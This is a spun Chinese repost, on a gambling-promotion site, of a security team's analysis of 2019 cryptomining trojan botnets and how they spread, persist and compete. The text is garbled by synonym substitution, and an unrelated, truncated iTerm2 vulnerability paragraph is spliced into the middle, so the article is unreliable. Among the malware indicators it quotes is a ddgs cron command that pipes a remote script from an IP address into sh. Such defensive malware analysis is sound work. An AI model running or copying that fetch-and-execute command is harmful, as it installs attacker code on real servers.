生计照样消灭?一文读懂挖矿木马的战略战术 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

生计照样消灭?一文读懂挖矿木马的战略战术

Sunbet官网

Sunbet官网现已开放Sunbet游戏手机版下载,进入官网Sunbet即可进行Sunbet手机APP下载,手机版操作更便捷,随身携带可随时随地享受游戏乐趣,手机版与电脑客户端差别不大,两者皆能为用户带来很好的娱乐时光,让客户第一时间掌握各种游戏信息,拥有更好的游戏体验感,是Sunbet运营的原则,给你最简单的快乐,和你一起娱乐,让快乐成为联系你我的纽带,为你带来不一样的感觉!

,

媒介

比特币等假造钱银在2019年迎来了久违的大幅上涨,从最低3000美圆上涨至7月份的14000美圆,涨幅达300%,庞大的款项引诱使得更多的黑产团伙加入了歹意挖矿的行列。阿里云平安团队经由过程对云上僵尸收集家属的监控,发明歹意挖矿已成为黑产团伙重要的取利体式格局。2019年共监控到58个成范围的挖矿木马团伙(数据截止到8月尾),以积累感染量定义木马活泼度,下图/表是活泼TOP10的木马家属及简介。本文尝试从宏观角度剖析、总结挖矿木马经常运用手艺及发展趋向,以期能够给企业平安防护带来启发。

中心看法

· 木马投放体式格局周全蠕虫化,多种破绽组合进击成为趋向,N-day破绽应用速率在加速

这类趋向无疑使人非常担心,意味着挖矿木马的流传才能在大幅加强,变得无孔不入。一旦企业的信息体系存在恣意可被应用的破绽,那末企业内网将会疾速陷落,挖矿行动会抢占CPU资本,严重影响企业信息体系运转。这对企业的破绽治理和平安防备才能有了更高、更快的请求。

· 木马耐久化手艺被成熟应用,rootkit、无文件手艺成为趋向

挖矿木马入侵胜利后一定愿望能够久长稳固的发掘出假造钱银,其手艺上运用rootkit、无文件等手艺完成历久、隐蔽运转。关于平常的运维职员,体系一旦中招后,固执木马是难以消灭的,这须要企业具有更专业的平安应急相应才能。

· 木马最先涌现跨平台趋向

Golang言语天生具有跨平台编译才能,这个特性轻易黑产团伙在多平台间移植,新涌现的歹意软件运用GO也成为了一种趋向。TOP10中有6个是2019年迸发的挖矿木马,其中有5个是GO言语完成的,MinerGuard和kworkerds已具有了Linux/Windows双平台流传的才能。

工欲善,利其器-进击之术

全网破绽扫描/投放->蠕虫化投放

1、应用单一或多个IP进击全网破绽举行投放

这类投放体式格局较为原始,无横向流传才能,效力比较低下,且轻易被防备阻拦。在我们的监控中,运用这类体式格局的木马范围广泛较小。比方:8220Miner牢固运用多个外洋IP举行延续进击,会按期替换IP,但替换频次较低。而ddsMiner经由过程sqlserver入侵,进击载荷会下载名为dds.exe的PE文件(如:http://113[.]69[.]206[.]219:4523/dds.exe),该团伙天天最少运用1个新的IP举行全网进击,进击时候延续数小时,该IP也是当天的歹意文件托管站。

2、蠕虫化投放
蠕虫化的挖矿botnet具有进击模块,扫描并感染收集上的其他效劳器,运用这类体式格局举行流传会根据指数增进的速率扩大,且这类体式格局会使得溯源和防备变得越发难题。TOP10中2019年迸发的几个挖矿botnet悉数运用蠕虫化投放体式格局,他们都是在短时候内(几天时候)获得疾速扩大跻身TOP10。

单一破绽应用->组合破绽横向流传

初期的挖矿木马运用牢固破绽在公网流传,流传速率和范围受限。而运用多种破绽组合进击的体式格局使得挖矿木马具有了内网横向流传的才能,进击模块会集成通用的WEB效劳破绽、爆破、数据库破绽等进击体式格局。‘智慧’的挖矿木马作者更是运用差别的内外网进击战略,举行更高效的流传。比方:Windows平台下的Bulehero挖矿木马,在内网优先运用永久之蓝破绽、ipc$爆破、RDP爆破举行流传,在公网则优先运用Web效劳破绽举行流传。Linux平台下的kerberods挖矿木马,在内网优先运用当地ssh key、ssh爆破举行流传。在这类高效战略下,企业内网一般在几分钟内被悉数入侵。

N-day破绽疾速应用

互联网大范围存在且未被修复的通用破绽每每成为挖矿僵尸收集争取的’肥肉’,N-day破绽迸发后难以在短时候内获得有用修复,’嗅觉’敏锐的黑产团伙会很快归入挖矿木马的武器库。据我们视察,N-day破绽留给运维职员举行修复的空窗期越来越短,如Jboss反序列化破绽于2017年5月被发明,岁尾JbossMiner最先对其大范围应用。2018年12月ThinkPhp长途代码实行破绽迸发,十几天后被BuleHero团伙应用举行。2019年4月8日Confluence RCE 破绽应用POC宣布,4月10日就kererods蠕虫就最先应用该破绽放肆流传,中心只隔了短短两天。再次对云平台及用户的疾速相应才能组成严峻考验。

通往财产之路-取利之术

矿池设置体式格局:

挖矿木马植入开源挖矿顺序举行挖矿,矿机顺序启动时经由过程命令行传入挖矿参数,然则这类体式格局较为原始,释放出的木马没法修正设置参数。第二种体式格局运用设置文件下发,连系定时使命完成对挖矿参数的掌握,这类运用体式格局较为罕见。以上两种体式格局都存在易被检测的特性,有些黑产团伙会对开源挖矿顺序举行二次开发,将矿机设置参数硬编码在歹意顺序中,并举行加壳匹敌检测,以到达隐蔽挖矿的目的。

· 挖矿顺序命令行设置

· 经由过程设置文件:

MinerGuard矿机设置文件截图!

· 挖矿软件硬编码设置

ddgs硬编码的矿池及钱包地点

挖矿体式格局:大众矿池->矿池代办

1、大众矿池体式格局
运用匿名的大众矿池是歹意挖矿最罕见的体式格局,运用方法简朴,然则因为须要设置自力的钱包地点,因而易被跟踪溯源,而且对bot挖矿无治理才能。

· 以下图是在大众矿池上查询8220Miner的钱包地点及算力,现在该地点发掘到15.5个门罗币,可借此估算出该挖矿僵尸收集的范围。

2、矿池代办
有些挖矿僵尸收集会本身搭建矿池代办,经由过程代办可下降挖矿难度,也可根据收益随时切换高收益矿池、高收益矿币种,这类体式格局没法经由过程钱包地点举行跟踪。

· 下图是监控到masscanMiner运用了矿池代办举行挖矿,经由过程历程cmdline可知矿池开放在121.42.151.137的28850端口,这并不是一大众矿池经常运用的端口,上岸账号也为默许账号。

其他变现体式格局:附带DDos、Socks代办

除了挖矿这类本职工作,有些黑产团伙会顺带经由过程其他体式格局举行变现,比方DDos、代办等。以下图是sicMiner歹意样本会运转一个python剧本,该剧本是github上开源的socks5代办,代办运转在7081端口,该团伙多是经由过程出卖代办举行变现。

生计照样消灭-耐久化之术

挖矿木马入侵胜利后须要历久驻留于目的操纵体系,以到达历久稳固地产出假造钱银,一般会运用种种手艺匹敌平安检测和运维职员的消灭。

消灭/卸载平安软件

卸载宿主机的平安防护软件是通例操纵,因为挖矿的进击行动多针对效劳器,黑产团伙也迥殊针对云环境的平安软件精准匹敌。以下是kworderds蠕虫在windows、Linux下卸载差别平安软件的行动。

· kworkerds封闭杀毒软件

· kworkerds挖矿蠕虫卸载安骑士等平安东西

rootkit手艺

1、经由过程定时使命/计划使命完成常驻
Linux下的crontab定时使命是许多歹意软件罕见的驻留体式格局,他们并不仅仅会把本身写入用户的crontab,还会写入软件包的crontab,如/etc/cron.d,如许使得本身更不轻易被发明。而Windows下则经由过程计划使命、修正注册表完成相似的驻留体式格局。以下是ddgs蠕虫歹意历程行动经由过程crondtab启动。

· ddgs经由过程CROND定时使命启动歹意shell:/bin/sh -c curl -fsSL http://218[.]248[.]40[.]228:9999/i.sh?6 | sh

2、动态链接库预加载型rootkit
Linux下的动态链接库预加载机制在加载其他通例体系库之前就会预先加载用户定义的动态链接库,假如自定义库的函数与体系库中找到的函数具有雷同的称号,自定义动态链接库就会掩盖体系库中的函数。进击者经由过程动态衔接库预加载,完成对libc中诸如readdir等经常运用函数的hook,当ps、top等shell指令尝试读取/proc/目次猎取历程信息时对歹意举行隐蔽。

· 图是8220miner运用该手艺挟制linux动态链接库设置文件/etc/ld.so.preload。

CVE-2019-9535:长达7年的iTerm2 macOS Terminal App RCE漏洞

Mozilla Open Source Support Program (MOSS)在进行独立安全审计时在iTerm2 macOS Terminal 模拟器App中发现了一个存在长达7年之久的RCE漏洞。iTerm2 macOS Terminal 模拟器App是替代Mac设备内置的terminal APP的最佳选择的开源项目之一。 该漏洞CVE编号为CVE-2019-9535,根据Mozilla发布的安全公告,RCE漏洞位于iTerm2的tmux integration 特征中,成功利用后,攻击者可以通过向terminal提供恶意输出来执行任意命令。 POC视频如下所示: https://ffp4g1ylyit3jdyti1hqcvtb-wpengine.netdna-ssl.com/security/files/2019/10/cve-2019-9535.webm 如PoC视频所示,漏洞的潜在攻击向量包括

无文件进击手艺

无文件进击不须要将歹意软件落地到磁盘,因而难以被杀软查杀,具有更好的隐蔽性。在挖矿僵尸收集中一般运用种种东西(比方Windows的WMI命令行东西wmic.exe)或许剧本编程言语(如PowerShell)供应的API接口接见WMI,来完成无文件进击。以下是TheHidden运用wmic、WannaMine运用powershell举行无文件进击。

· TheHidden运用wmic无文件进击的代码片断

· WannaMine的歹意历程运用powershell隐蔽、编码功用举行无文件进击

文件名/途径殽杂

除了匹敌种种平安东西,还要匹敌运维职员的手动排查,将文件名和途径举行殽杂也是经常运用的手腕。比方ibus会将歹意文件写入多个体系目次下,而且经由过程随机变动大小写等体式格局天生和隐蔽目次下文件名相似的殽杂文件名。

· ibus天生在体系目次下的殽杂目次

c&c通讯

因为歹意挖矿行动不须要对bot举行强掌握,大部分的挖矿木马都不具有完整的c&c掌握模块,他们一般运用设置文件连系定时使命,完成对bot的设置变动和版本更新。在TOP10中只要ddgs和ibus有完整的c&c掌握功用。如ddgs,它的c&c通讯运用uMsg序列化,能够完成进击指令下发、版本设置更新等功用,在本年1月份的更新中以至最先运用P2P举行c&c掌握IP的下发。

· ddgs反序列化后的c&c掌握指令

· ibus的c&c掌握模块的歹意代码

暗网

从2018岁尾最先挖矿木马最先频仍运用暗网举行歹意文件托管,因为其匿名通讯的特性最先在歹意软件中逐步盛行。以下是watchbog蠕虫运用暗网地点下载歹意文件。

· watchbog蠕虫运用暗网地点下载歹意文件。

文件范例假装

为了防备被追踪溯源,黑客喜好将歹意文件托管在公然的免费网站上,他们须要将歹意shell、二进制文件假装成图片以防备被检测。

· 将二进制/shell文件假装成图片文件是通例操纵

后门账号

除了通例驻留操纵,我们监控到多个挖矿木马会在宿主机上留下后门账号,纵然木马被消灭掉,黑客也能经由过程后门账号再次入侵。

· TheHidden增加后门账号,账号名admin,并对该账号举行了隐蔽。

· watchdog增加后门ssh key

人在江湖飘怎能不挨刀-资本合作之术

除了和平安软件的匹敌,挖矿僵尸收集还要面对偕行的合作,毕竟CPU资本是有限的,一机不容二’马’!

杀死合作历程

这几乎是挖矿木马的通例操纵,经由过程历程的指纹库推断其他挖矿历程,或许直接杀死CPU占用率高的历程。

· kerberods举行资本合作的历程指纹库

修正防火墙

修正防火墙的iptables,将存在破绽的效劳端口封闭防备其他挖矿木马入侵。或许封闭罕见的矿池端口,阻断合作对手的挖矿行动。

· 修正iptables设置举行资本合作

修正hosts

经由过程修正/etc/hosts将合作对手的域名、罕见矿池域名sinkhole,也是一种资本合作手腕。我们也见到了对应的反制步伐:推断/etc/hosts是不是被修正过,并重写/etc/hosts举行掩盖。

· kthrotldsPretender的反制步伐:重写hosts

借助其他botnet

除了以上通例的合作手腕外,借助其他僵尸收集举行流传也是一种高妙的手腕。systemdMiner在本年4月份就曾’借鸡下蛋’,经由过程入侵ddgs的c&c中控主机举行疾速扩大。

· systemdMiner应用ddgs的中控下发的shell

防护发起

1. 企业须要对破绽举行治理并实时修复,不然轻易成为挖矿木马的受害者。

2. 发起运用阿里云平安的下一代云防火墙产物,其阻断歹意外联、能够设置智能战略的功用,能够有用辅佐防备入侵。哪怕进击者在主机上的隐蔽手腕再高妙,下载、挖矿、反弹shell这些操纵,都须要举行歹意外联;云防火墙的阻拦将完全阻断进击链。另外,用户还能够经由过程自定义战略,直接屏障歹意网站,到达阻断入侵的目的。另外,云防火墙独占的假造补丁功用,能够辅佐客户更天真、更“无感”地阻断进击。

3. 关于有更高定制化请求的用户,能够斟酌运用阿里云平安管家效劳。购置效劳后将有经验丰富的平安专家供应咨询效劳,定制合适您的计划,辅佐加固体系,防备入侵。入侵事宜发生后,也可参与直接辅佐入侵后的清算、事宜溯源等,合适有较高平安需求的用户,或未雇佣平安工程师,但愿望保证体系平安的企业。

原文地点: https://www.4hou.com/system/20795.html


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明生计照样消灭?一文读懂挖矿木马的战略战术
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址